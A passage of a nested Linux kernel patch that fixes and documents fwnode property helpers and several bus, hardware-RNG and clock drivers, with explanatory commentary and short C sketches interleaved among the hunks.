++ * parent was available.
+  */
+ struct fwnode_handle *fwnode_get_next_parent(struct fwnode_handle *fwnode)
+ {
+@@ -621,8 +635,10 @@ EXPORT_SYMBOL_GPL(fwnode_get_next_parent);
+  * firmware node that has a corresponding struct device and returns that struct
+  * device.
+  *
+- * The caller of this function is expected to call put_device() on the returned
+- * device when they are done.
++ * The caller is responsible for calling put_device() on the returned device
++ * pointer.
++ *
++ * Return: a pointer to the device of the @fwnode's closest ancestor.
+  */
+ struct device *fwnode_get_next_parent_dev(struct fwnode_handle *fwnode)
+ {
+@@ -643,7 +659,7 @@ struct device *fwnode_get_next_parent_dev(struct fwnode_handle *fwnode)
+  * fwnode_count_parents - Return the number of parents a node has
+  * @fwnode: The node the parents of which are to be counted
+  *
+- * Returns the number of parents a node has.
++ * Return: the number of parents a node has.
+  */
+ unsigned int fwnode_count_parents(const struct fwnode_handle *fwnode)
+ {
+@@ -662,12 +678,12 @@ EXPORT_SYMBOL_GPL(fwnode_count_parents);
+  * @fwnode: The node the parent of which is requested
+  * @depth: Distance of the parent from the node
+  *
+- * Returns the nth parent of a node. If there is no parent at the requested
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: the nth parent of a node. If there is no parent at the requested
+  * @depth, %NULL is returned. If @depth is 0, the functionality is equivalent to
+  * fwnode_handle_get(). For @depth == 1, it is fwnode_get_parent() and so on.
+- *
+- * The caller is responsible for calling fwnode_handle_put() for the returned
+- * node.
+  */
+ struct fwnode_handle *fwnode_get_nth_parent(struct fwnode_handle *fwnode,
+ 					    unsigned int depth)
+@@ -692,7 +708,7 @@ EXPORT_SYMBOL_GPL(fwnode_get_nth_parent);
+  *
+  * A node is considered an ancestor of itself too.
+  *
+- * Returns true if @ancestor is an ancestor of @child. Otherwise, returns false.
++ * Return: true if @ancestor is an ancestor of @child. Otherwise, returns false.
+  */
+ bool fwnode_is_ancestor_of(struct fwnode_handle *ancestor, struct fwnode_handle *child)
+ {
+@@ -717,6 +733,10 @@ bool fwnode_is_ancestor_of(struct fwnode_handle *ancestor, struct fwnode_handle
+  * fwnode_get_next_child_node - Return the next child node handle for a node
+  * @fwnode: Firmware node to find the next child node for.
+  * @child: Handle to one of the node's child nodes or a %NULL handle.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @child
++ * unconditionally.
+  */
+ struct fwnode_handle *
+ fwnode_get_next_child_node(const struct fwnode_handle *fwnode,
+@@ -727,10 +747,13 @@ fwnode_get_next_child_node(const struct fwnode_handle *fwnode,
+ EXPORT_SYMBOL_GPL(fwnode_get_next_child_node);
+ 
+ /**
+- * fwnode_get_next_available_child_node - Return the next
+- * available child node handle for a node
++ * fwnode_get_next_available_child_node - Return the next available child node handle for a node
+  * @fwnode: Firmware node to find the next child node for.
+  * @child: Handle to one of the node's child nodes or a %NULL handle.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @child
++ * unconditionally.
+  */
+ struct fwnode_handle *
+ fwnode_get_next_available_child_node(const struct fwnode_handle *fwnode,
+@@ -754,7 +777,11 @@ EXPORT_SYMBOL_GPL(fwnode_get_next_available_child_node);
+ /**
+  * device_get_next_child_node - Return the next child node handle for a device
+  * @dev: Device to find the next child node for.
+- * @child: Handle to one of the device's child nodes or a null handle.
++ * @child: Handle to one of the device's child nodes or a %NULL handle.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @child
++ * unconditionally.
+  */
+ struct fwnode_handle *device_get_next_child_node(struct device *dev,
+ 						 struct fwnode_handle *child)
+@@ -779,6 +806,9 @@ EXPORT_SYMBOL_GPL(device_get_next_child_node);
+  * fwnode_get_named_child_node - Return first matching named child node handle
+  * @fwnode: Firmware node to find the named child node for.
+  * @childname: String to match child node name against.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_get_named_child_node(const struct fwnode_handle *fwnode,
+@@ -792,6 +822,9 @@ EXPORT_SYMBOL_GPL(fwnode_get_named_child_node);
+  * device_get_named_child_node - Return first matching named child node handle
+  * @dev: Device to find the named child node for.
+  * @childname: String to match child node name against.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *device_get_named_child_node(struct device *dev,
+ 						  const char *childname)
+@@ -804,7 +837,10 @@ EXPORT_SYMBOL_GPL(device_get_named_child_node);
+  * fwnode_handle_get - Obtain a reference to a device node
+  * @fwnode: Pointer to the device node to obtain the reference to.
+  *
+- * Returns the fwnode handle.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: the fwnode handle.
+  */
+ struct fwnode_handle *fwnode_handle_get(struct fwnode_handle *fwnode)
+ {
+@@ -833,6 +869,8 @@ EXPORT_SYMBOL_GPL(fwnode_handle_put);
+  * fwnode_device_is_available - check if a device is available for use
+  * @fwnode: Pointer to the fwnode of the device.
+  *
++ * Return: true if device is available for use. Otherwise, returns false.
++ *
+  * For fwnode node types that don't implement the .device_is_available()
+  * operation, this function returns true.
+  */
+@@ -851,6 +889,8 @@ EXPORT_SYMBOL_GPL(fwnode_device_is_available);
+ /**
+  * device_get_child_node_count - return the number of child nodes for device
+  * @dev: Device to count the child nodes for
++ *
++ * Return: the number of child nodes for a given device.
+  */
+ unsigned int device_get_child_node_count(struct device *dev)
+ {
+@@ -926,7 +966,7 @@ EXPORT_SYMBOL_GPL(device_get_phy_mode);
+  * @fwnode:	Pointer to the firmware node
+  * @index:	Index of the IO range
+  *
+- * Returns a pointer to the mapped memory.
++ * Return: a pointer to the mapped memory.
+  */
+ void __iomem *fwnode_iomap(struct fwnode_handle *fwnode, int index)
+ {
+@@ -939,12 +979,18 @@ EXPORT_SYMBOL(fwnode_iomap);
+  * @fwnode:	Pointer to the firmware node
+  * @index:	Zero-based index of the IRQ
+  *
+- * Returns Linux IRQ number on success. Other values are determined
+- * accordingly to acpi_/of_ irq_get() operation.
++ * Return: Linux IRQ number on success. Negative errno on failure.
+  */
+ int fwnode_irq_get(const struct fwnode_handle *fwnode, unsigned int index)
+ {
+-	return fwnode_call_int_op(fwnode, irq_get, index);
++	int ret;
++
++	ret = fwnode_call_int_op(fwnode, irq_get, index);
++	/* We treat mapping errors as an invalid case */
++	if (ret == 0)
++		return -EINVAL;
++
++	return ret;
+ }
+ EXPORT_SYMBOL(fwnode_irq_get);
+ 
+@@ -959,8 +1005,7 @@ EXPORT_SYMBOL(fwnode_irq_get);
+  * number of the IRQ resource corresponding to the index of the matched
+  * string.
+  *
+- * Return:
+- * Linux IRQ number on success, or negative errno otherwise.
++ * Return: Linux IRQ number on success, or negative errno otherwise.
+  */
+ int fwnode_irq_get_byname(const struct fwnode_handle *fwnode, const char *name)
+ {
+@@ -982,7 +1027,11 @@ EXPORT_SYMBOL(fwnode_irq_get_byname);
+  * @fwnode: Pointer to the parent firmware node
+  * @prev: Previous endpoint node or %NULL to get the first
+  *
+- * Returns an endpoint firmware node pointer or %NULL if no more endpoints
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @prev
++ * unconditionally.
++ *
++ * Return: an endpoint firmware node pointer or %NULL if no more endpoints
+  * are available.
+  */
+ struct fwnode_handle *
+@@ -1022,6 +1071,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_next_endpoint);
+  * fwnode_graph_get_port_parent - Return the device fwnode of a port endpoint
+  * @endpoint: Endpoint firmware node of the port
+  *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
+  * Return: the firmware node of the device the @endpoint belongs to.
+  */
+ struct fwnode_handle *
+@@ -1043,6 +1095,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_port_parent);
+  * @fwnode: Endpoint firmware node pointing to the remote endpoint
+  *
+  * Extracts firmware node of a remote device the @fwnode points to.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_remote_port_parent(const struct fwnode_handle *fwnode)
+@@ -1063,6 +1118,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_remote_port_parent);
+  * @fwnode: Endpoint firmware node pointing to the remote endpoint
+  *
+  * Extracts firmware node of a remote port the @fwnode points to.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_remote_port(const struct fwnode_handle *fwnode)
+@@ -1076,6 +1134,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_remote_port);
+  * @fwnode: Endpoint firmware node pointing to the remote endpoint
+  *
+  * Extracts firmware node of a remote endpoint the @fwnode points to.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_remote_endpoint(const struct fwnode_handle *fwnode)
+@@ -1103,8 +1164,11 @@ static bool fwnode_graph_remote_available(struct fwnode_handle *ep)
+  * @endpoint: identifier of the endpoint node under the port node
+  * @flags: fwnode lookup flags
+  *
+- * Return the fwnode handle of the local endpoint corresponding the port and
+- * endpoint IDs or NULL if not found.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: the fwnode handle of the local endpoint corresponding to the port and
++ * endpoint IDs or %NULL if not found.
+  *
+  * If FWNODE_GRAPH_ENDPOINT_NEXT is passed in @flags and the specified endpoint
+  * has not been found, look for the closest endpoint ID greater than the
+@@ -1112,9 +1176,6 @@ static bool fwnode_graph_remote_available(struct fwnode_handle *ep)
+  *
+  * Does not return endpoints that belong to disabled devices or endpoints that
+  * are unconnected, unless FWNODE_GRAPH_DEVICE_DISABLED is passed in @flags.
+- *
+- * The returned endpoint needs to be released by calling fwnode_handle_put() on
+- * it when it is not needed any more.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_endpoint_by_id(const struct fwnode_handle *fwnode,
+@@ -1320,7 +1381,8 @@ EXPORT_SYMBOL_GPL(fwnode_connection_find_match);
+  * @fwnode and other device nodes. @match will be used to convert the
+  * connection description to data the caller is expecting to be returned
+  * through the @matches array.
+- * If @matches is NULL @matches_len is ignored and the total number of resolved
++ *
++ * If @matches is %NULL @matches_len is ignored and the total number of resolved
+  * matches is returned.
+  *
+  * Return: Number of matches resolved, or negative errno.
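
Most of the kernel-doc added above documents one ownership rule: the *_get_next_* helpers put the reference on the node passed in and return a new one, so the canonical iteration needs no explicit fwnode_handle_put() except when bailing out early with a node in hand. A sketch of that caller pattern (the property name is hypothetical):

    static struct fwnode_handle *find_child(struct device *dev)
    {
            struct fwnode_handle *child = NULL;

            /* each pass puts the old @child and returns the next one */
            while ((child = device_get_next_child_node(dev, child))) {
                    if (fwnode_property_present(child, "example-prop"))
                            return child;   /* caller must put this ref */
            }
            return NULL;
    }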
+diff --git a/drivers/bus/fsl-mc/dprc-driver.c b/drivers/bus/fsl-mc/dprc-driver.c
+index 5e70f9775a0e3..d1e2d2987dd38 100644
+--- a/drivers/bus/fsl-mc/dprc-driver.c
++++ b/drivers/bus/fsl-mc/dprc-driver.c
+@@ -46,6 +46,9 @@ static int __fsl_mc_device_remove_if_not_in_mc(struct device *dev, void *data)
+ 	struct fsl_mc_child_objs *objs;
+ 	struct fsl_mc_device *mc_dev;
+ 
++	if (!dev_is_fsl_mc(dev))
++		return 0;
++
+ 	mc_dev = to_fsl_mc_device(dev);
+ 	objs = data;
+ 
+@@ -65,6 +68,9 @@ static int __fsl_mc_device_remove_if_not_in_mc(struct device *dev, void *data)
+ 
+ static int __fsl_mc_device_remove(struct device *dev, void *data)
+ {
++	if (!dev_is_fsl_mc(dev))
++		return 0;
++
+ 	fsl_mc_device_remove(to_fsl_mc_device(dev));
+ 	return 0;
+ }
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index 9a7d12332fadb..cae078bffc715 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -1808,7 +1808,7 @@ static u32 sysc_quirk_dispc(struct sysc *ddata, int dispc_offset,
+ 	if (!ddata->module_va)
+ 		return -EIO;
+ 
+-	/* DISP_CONTROL */
++	/* DISP_CONTROL, shut down lcd and digit on disable if enabled */
+ 	val = sysc_read(ddata, dispc_offset + 0x40);
+ 	lcd_en = val & lcd_en_mask;
+ 	digit_en = val & digit_en_mask;
+@@ -1820,7 +1820,7 @@ static u32 sysc_quirk_dispc(struct sysc *ddata, int dispc_offset,
+ 		else
+ 			irq_mask |= BIT(2) | BIT(3);	/* EVSYNC bits */
+ 	}
+-	if (disable & (lcd_en | digit_en))
++	if (disable && (lcd_en || digit_en))
+ 		sysc_write(ddata, dispc_offset + 0x40,
+ 			   val & ~(lcd_en_mask | digit_en_mask));
+ 
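
The ti-sysc fix deserves spelling out: disable is a 0/1 flag while lcd_en and digit_en are register bits at other positions, so the old bitwise AND evaluated to zero even when both operands were nonzero, and the shutdown write was skipped. A standalone demonstration of the difference:

    #include <stdio.h>

    int main(void)
    {
            unsigned int disable = 1, lcd_en = 1u << 8, digit_en = 0;

            /* bitwise: 1 & 0x100 == 0, the buggy form */
            printf("bitwise: %u\n", disable & (lcd_en | digit_en));
            /* logical: 1 && 1 == 1, the fixed form */
            printf("logical: %d\n", disable && (lcd_en || digit_en));
            return 0;
    }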
+diff --git a/drivers/char/hw_random/st-rng.c b/drivers/char/hw_random/st-rng.c
+index 15ba1e6fae4d2..6e9dfac9fc9f4 100644
+--- a/drivers/char/hw_random/st-rng.c
++++ b/drivers/char/hw_random/st-rng.c
+@@ -42,7 +42,6 @@
+ 
+ struct st_rng_data {
+ 	void __iomem	*base;
+-	struct clk	*clk;
+ 	struct hwrng	ops;
+ };
+ 
+@@ -85,26 +84,18 @@ static int st_rng_probe(struct platform_device *pdev)
+ 	if (IS_ERR(base))
+ 		return PTR_ERR(base);
+ 
+-	clk = devm_clk_get(&pdev->dev, NULL);
++	clk = devm_clk_get_enabled(&pdev->dev, NULL);
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+ 
+-	ret = clk_prepare_enable(clk);
+-	if (ret)
+-		return ret;
+-
+ 	ddata->ops.priv	= (unsigned long)ddata;
+ 	ddata->ops.read	= st_rng_read;
+ 	ddata->ops.name	= pdev->name;
+ 	ddata->base	= base;
+-	ddata->clk	= clk;
+-
+-	dev_set_drvdata(&pdev->dev, ddata);
+ 
+ 	ret = devm_hwrng_register(&pdev->dev, &ddata->ops);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register HW RNG\n");
+-		clk_disable_unprepare(clk);
+ 		return ret;
+ 	}
+ 
+@@ -113,15 +104,6 @@ static int st_rng_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int st_rng_remove(struct platform_device *pdev)
+-{
+-	struct st_rng_data *ddata = dev_get_drvdata(&pdev->dev);
+-
+-	clk_disable_unprepare(ddata->clk);
+-
+-	return 0;
+-}
+-
+ static const struct of_device_id st_rng_match[] __maybe_unused = {
+ 	{ .compatible = "st,rng" },
+ 	{},
+@@ -134,7 +116,6 @@ static struct platform_driver st_rng_driver = {
+ 		.of_match_table = of_match_ptr(st_rng_match),
+ 	},
+ 	.probe = st_rng_probe,
+-	.remove = st_rng_remove
+ };
+ 
+ module_platform_driver(st_rng_driver);
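
The st-rng conversion is the devm_clk_get_enabled() idiom: one call replaces devm_clk_get() plus clk_prepare_enable(), and the devres framework disables and unprepares the clock automatically on unbind, which is why both the remove() callback and the struct clk field can be deleted. A condensed probe sketch (driver name hypothetical):

    static int foo_probe(struct platform_device *pdev)
    {
            struct clk *clk;

            /* got, prepared and enabled; all undone on driver unbind */
            clk = devm_clk_get_enabled(&pdev->dev, NULL);
            if (IS_ERR(clk))
                    return PTR_ERR(clk);

            /* no clk_disable_unprepare() needed anywhere after this */
            return 0;
    }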
+diff --git a/drivers/char/hw_random/virtio-rng.c b/drivers/char/hw_random/virtio-rng.c
+index a6f3a8a2aca6d..35304117338ab 100644
+--- a/drivers/char/hw_random/virtio-rng.c
++++ b/drivers/char/hw_random/virtio-rng.c
+@@ -4,6 +4,7 @@
+  *  Copyright (C) 2007, 2008 Rusty Russell IBM Corporation
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/err.h>
+ #include <linux/hw_random.h>
+ #include <linux/scatterlist.h>
+@@ -37,13 +38,13 @@ struct virtrng_info {
+ static void random_recv_done(struct virtqueue *vq)
+ {
+ 	struct virtrng_info *vi = vq->vdev->priv;
++	unsigned int len;
+ 
+ 	/* We can get spurious callbacks, e.g. shared IRQs + virtio_pci. */
+-	if (!virtqueue_get_buf(vi->vq, &vi->data_avail))
++	if (!virtqueue_get_buf(vi->vq, &len))
+ 		return;
+ 
+-	vi->data_idx = 0;
+-
++	smp_store_release(&vi->data_avail, len);
+ 	complete(&vi->have_data);
+ }
+ 
+@@ -52,7 +53,6 @@ static void request_entropy(struct virtrng_info *vi)
+ 	struct scatterlist sg;
+ 
+ 	reinit_completion(&vi->have_data);
+-	vi->data_avail = 0;
+ 	vi->data_idx = 0;
+ 
+ 	sg_init_one(&sg, vi->data, sizeof(vi->data));
+@@ -88,7 +88,7 @@ static int virtio_read(struct hwrng *rng, void *buf, size_t size, bool wait)
+ 	read = 0;
+ 
+ 	/* copy available data */
+-	if (vi->data_avail) {
++	if (smp_load_acquire(&vi->data_avail)) {
+ 		chunk = copy_data(vi, buf, size);
+ 		size -= chunk;
+ 		read += chunk;
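
The virtio-rng hunk pairs smp_store_release() in the completion callback with smp_load_acquire() in the reader: a reader that observes a nonzero data_avail is then guaranteed to also see the buffer bytes written before the release. The same protocol in portable C11 atomics, which the kernel primitives map onto (standalone sketch):

    #include <stdatomic.h>
    #include <stdio.h>

    static unsigned char data[64];
    static _Atomic unsigned int data_avail;

    static void producer(void)
    {
            data[0] = 0xab; /* fill the buffer first */
            /* publish: all writes above become visible to acquirers */
            atomic_store_explicit(&data_avail, 1, memory_order_release);
    }

    static void consumer(void)
    {
            if (atomic_load_explicit(&data_avail, memory_order_acquire))
                    printf("%02x\n", data[0]); /* sees 0xab */
    }

    int main(void) { producer(); consumer(); return 0; }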
+diff --git a/drivers/clk/bcm/clk-raspberrypi.c b/drivers/clk/bcm/clk-raspberrypi.c
+index 679f4649a7efd..278f845572813 100644
+--- a/drivers/clk/bcm/clk-raspberrypi.c
++++ b/drivers/clk/bcm/clk-raspberrypi.c
+@@ -375,9 +375,9 @@ static int raspberrypi_discover_clocks(struct raspberrypi_clk *rpi,
+ 	while (clks->id) {
+ 		struct raspberrypi_clk_variant *variant;
+ 
+-		if (clks->id > RPI_FIRMWARE_NUM_CLK_ID) {
++		if (clks->id >= RPI_FIRMWARE_NUM_CLK_ID) {
+ 			dev_err(rpi->dev, "Unknown clock id: %u (max: %u)\n",
+-					   clks->id, RPI_FIRMWARE_NUM_CLK_ID);
++					   clks->id, RPI_FIRMWARE_NUM_CLK_ID - 1);
+ 			return -EINVAL;
+ 		}
+ 
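
The raspberrypi-clk fix is the standard off-by-one in a table lookup: a table with RPI_FIRMWARE_NUM_CLK_ID entries holds valid ids 0 through NUM - 1, so the reject test must use >= and the largest id worth reporting is NUM - 1. The generic shape of the guard (names hypothetical):

    if (id >= ARRAY_SIZE(table)) {
            dev_err(dev, "Unknown id: %u (max: %zu)\n",
                    id, ARRAY_SIZE(table) - 1);
            return -EINVAL;
    }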
+diff --git a/drivers/clk/clk-cdce925.c b/drivers/clk/clk-cdce925.c
+index ef9a2d44e40c3..d88e1d681a2ce 100644
+--- a/drivers/clk/clk-cdce925.c
++++ b/drivers/clk/clk-cdce925.c
+@@ -714,6 +714,10 @@ static int cdce925_probe(struct i2c_client *client)
+ 	for (i = 0; i < data->chip_info->num_plls; ++i) {
+ 		pll_clk_name[i] = kasprintf(GFP_KERNEL, "%pOFn.pll%d",
+ 			client->dev.of_node, i);
++		if (!pll_clk_name[i]) {
++			err = -ENOMEM;
++			goto error;
++		}
+ 		init.name = pll_clk_name[i];
+ 		data->pll[i].chip = data;
+ 		data->pll[i].hw.init = &init;
+@@ -755,6 +759,10 @@ static int cdce925_probe(struct i2c_client *client)
+ 	init.num_parents = 1;
+ 	init.parent_names = &parent_name; /* Mux Y1 to input */
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.Y1", client->dev.of_node);
++	if (!init.name) {
++		err = -ENOMEM;
++		goto error;
++	}
+ 	data->clk[0].chip = data;
+ 	data->clk[0].hw.init = &init;
+ 	data->clk[0].index = 0;
+@@ -773,6 +781,10 @@ static int cdce925_probe(struct i2c_client *client)
+ 	for (i = 1; i < data->chip_info->num_outputs; ++i) {
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.Y%d",
+ 			client->dev.of_node, i+1);
++		if (!init.name) {
++			err = -ENOMEM;
++			goto error;
++		}
+ 		data->clk[i].chip = data;
+ 		data->clk[i].hw.init = &init;
+ 		data->clk[i].index = i;
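
The cdce925 hunks, like the versaclock5 ones further down, all add the same missing check: kasprintf() allocates, so it returns NULL on memory exhaustion, and the result has to be tested before being handed to the clk framework. The recurring shape, sketched (the error label is hypothetical):

    init.name = kasprintf(GFP_KERNEL, "%pOFn.pll%d", np, i);
    if (!init.name) {
            err = -ENOMEM;
            goto error;     /* unwind whatever registered so far */
    }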
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index 3e98a16eba6bb..35b2519f16961 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -353,7 +353,7 @@ static const struct rs9_chip_info renesas_9fgv0241_info = {
+ };
+ 
+ static const struct i2c_device_id rs9_id[] = {
+-	{ "9fgv0241", .driver_data = RENESAS_9FGV0241 },
++	{ "9fgv0241", .driver_data = (kernel_ulong_t)&renesas_9fgv0241_info },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(i2c, rs9_id);
+diff --git a/drivers/clk/clk-si5341.c b/drivers/clk/clk-si5341.c
+index 0e528d7ba656e..c7d8cbd22bacc 100644
+--- a/drivers/clk/clk-si5341.c
++++ b/drivers/clk/clk-si5341.c
+@@ -1553,7 +1553,7 @@ static int si5341_probe(struct i2c_client *client)
+ 	struct clk_init_data init;
+ 	struct clk *input;
+ 	const char *root_clock_name;
+-	const char *synth_clock_names[SI5341_NUM_SYNTH];
++	const char *synth_clock_names[SI5341_NUM_SYNTH] = { NULL };
+ 	int err;
+ 	unsigned int i;
+ 	struct clk_si5341_output_config config[SI5341_MAX_NUM_OUTPUTS];
+@@ -1697,6 +1697,10 @@ static int si5341_probe(struct i2c_client *client)
+ 	for (i = 0; i < data->num_synth; ++i) {
+ 		synth_clock_names[i] = devm_kasprintf(&client->dev, GFP_KERNEL,
+ 				"%s.N%u", client->dev.of_node->name, i);
++		if (!synth_clock_names[i]) {
++			err = -ENOMEM;
++			goto free_clk_names;
++		}
+ 		init.name = synth_clock_names[i];
+ 		data->synth[i].index = i;
+ 		data->synth[i].data = data;
+@@ -1705,6 +1709,7 @@ static int si5341_probe(struct i2c_client *client)
+ 		if (err) {
+ 			dev_err(&client->dev,
+ 				"synth N%u registration failed\n", i);
++			goto free_clk_names;
+ 		}
+ 	}
+ 
+@@ -1714,6 +1719,10 @@ static int si5341_probe(struct i2c_client *client)
+ 	for (i = 0; i < data->num_outputs; ++i) {
+ 		init.name = kasprintf(GFP_KERNEL, "%s.%d",
+ 			client->dev.of_node->name, i);
++		if (!init.name) {
++			err = -ENOMEM;
++			goto free_clk_names;
++		}
+ 		init.flags = config[i].synth_master ? CLK_SET_RATE_PARENT : 0;
+ 		data->clk[i].index = i;
+ 		data->clk[i].data = data;
+@@ -1735,7 +1744,7 @@ static int si5341_probe(struct i2c_client *client)
+ 		if (err) {
+ 			dev_err(&client->dev,
+ 				"output %u registration failed\n", i);
+-			goto cleanup;
++			goto free_clk_names;
+ 		}
+ 		if (config[i].always_on)
+ 			clk_prepare(data->clk[i].hw.clk);
+@@ -1745,7 +1754,7 @@ static int si5341_probe(struct i2c_client *client)
+ 			data);
+ 	if (err) {
+ 		dev_err(&client->dev, "unable to add clk provider\n");
+-		goto cleanup;
++		goto free_clk_names;
+ 	}
+ 
+ 	if (initialization_required) {
+@@ -1753,11 +1762,11 @@ static int si5341_probe(struct i2c_client *client)
+ 		regcache_cache_only(data->regmap, false);
+ 		err = regcache_sync(data->regmap);
+ 		if (err < 0)
+-			goto cleanup;
++			goto free_clk_names;
+ 
+ 		err = si5341_finalize_defaults(data);
+ 		if (err < 0)
+-			goto cleanup;
++			goto free_clk_names;
+ 	}
+ 
+ 	/* wait for device to report input clock present and PLL lock */
+@@ -1766,32 +1775,31 @@ static int si5341_probe(struct i2c_client *client)
+ 	       10000, 250000);
+ 	if (err) {
+ 		dev_err(&client->dev, "Error waiting for input clock or PLL lock\n");
+-		goto cleanup;
++		goto free_clk_names;
+ 	}
+ 
+ 	/* clear sticky alarm bits from initialization */
+ 	err = regmap_write(data->regmap, SI5341_STATUS_STICKY, 0);
+ 	if (err) {
+ 		dev_err(&client->dev, "unable to clear sticky status\n");
+-		goto cleanup;
++		goto free_clk_names;
+ 	}
+ 
+ 	err = sysfs_create_files(&client->dev.kobj, si5341_attributes);
+-	if (err) {
++	if (err)
+ 		dev_err(&client->dev, "unable to create sysfs files\n");
+-		goto cleanup;
+-	}
+ 
++free_clk_names:
+ 	/* Free the names, clk framework makes copies */
+ 	for (i = 0; i < data->num_synth; ++i)
+ 		 devm_kfree(&client->dev, (void *)synth_clock_names[i]);
+ 
+-	return 0;
+-
+ cleanup:
+-	for (i = 0; i < SI5341_MAX_NUM_OUTPUTS; ++i) {
+-		if (data->clk[i].vddo_reg)
+-			regulator_disable(data->clk[i].vddo_reg);
++	if (err) {
++		for (i = 0; i < SI5341_MAX_NUM_OUTPUTS; ++i) {
++			if (data->clk[i].vddo_reg)
++				regulator_disable(data->clk[i].vddo_reg);
++		}
+ 	}
+ 	return err;
+ }
+diff --git a/drivers/clk/clk-versaclock5.c b/drivers/clk/clk-versaclock5.c
+index 88689415aff9c..ef50ab78dd90d 100644
+--- a/drivers/clk/clk-versaclock5.c
++++ b/drivers/clk/clk-versaclock5.c
+@@ -450,10 +450,7 @@ static long vc5_pll_round_rate(struct clk_hw *hw, unsigned long rate,
+ 	u32 div_int;
+ 	u64 div_frc;
+ 
+-	if (rate < VC5_PLL_VCO_MIN)
+-		rate = VC5_PLL_VCO_MIN;
+-	if (rate > VC5_PLL_VCO_MAX)
+-		rate = VC5_PLL_VCO_MAX;
++	rate = clamp(rate, VC5_PLL_VCO_MIN, VC5_PLL_VCO_MAX);
+ 
+ 	/* Determine integer part, which is 12 bit wide */
+ 	div_int = rate / *parent_rate;
+@@ -1030,6 +1027,11 @@ static int vc5_probe(struct i2c_client *client)
+ 	}
+ 
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.mux", client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
++
+ 	init.ops = &vc5_mux_ops;
+ 	init.flags = 0;
+ 	init.parent_names = parent_names;
+@@ -1044,6 +1046,10 @@ static int vc5_probe(struct i2c_client *client)
+ 		memset(&init, 0, sizeof(init));
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.dbl",
+ 				      client->dev.of_node);
++		if (!init.name) {
++			ret = -ENOMEM;
++			goto err_clk;
++		}
+ 		init.ops = &vc5_dbl_ops;
+ 		init.flags = CLK_SET_RATE_PARENT;
+ 		init.parent_names = parent_names;
+@@ -1059,6 +1065,10 @@ static int vc5_probe(struct i2c_client *client)
+ 	/* Register PFD */
+ 	memset(&init, 0, sizeof(init));
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.pfd", client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
+ 	init.ops = &vc5_pfd_ops;
+ 	init.flags = CLK_SET_RATE_PARENT;
+ 	init.parent_names = parent_names;
+@@ -1076,6 +1086,10 @@ static int vc5_probe(struct i2c_client *client)
+ 	/* Register PLL */
+ 	memset(&init, 0, sizeof(init));
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.pll", client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
+ 	init.ops = &vc5_pll_ops;
+ 	init.flags = CLK_SET_RATE_PARENT;
+ 	init.parent_names = parent_names;
+@@ -1095,6 +1109,10 @@ static int vc5_probe(struct i2c_client *client)
+ 		memset(&init, 0, sizeof(init));
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.fod%d",
+ 				      client->dev.of_node, idx);
++		if (!init.name) {
++			ret = -ENOMEM;
++			goto err_clk;
++		}
+ 		init.ops = &vc5_fod_ops;
+ 		init.flags = CLK_SET_RATE_PARENT;
+ 		init.parent_names = parent_names;
+@@ -1113,6 +1131,10 @@ static int vc5_probe(struct i2c_client *client)
+ 	memset(&init, 0, sizeof(init));
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.out0_sel_i2cb",
+ 			      client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
+ 	init.ops = &vc5_clk_out_ops;
+ 	init.flags = CLK_SET_RATE_PARENT;
+ 	init.parent_names = parent_names;
+@@ -1139,6 +1161,10 @@ static int vc5_probe(struct i2c_client *client)
+ 		memset(&init, 0, sizeof(init));
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.out%d",
+ 				      client->dev.of_node, idx + 1);
++		if (!init.name) {
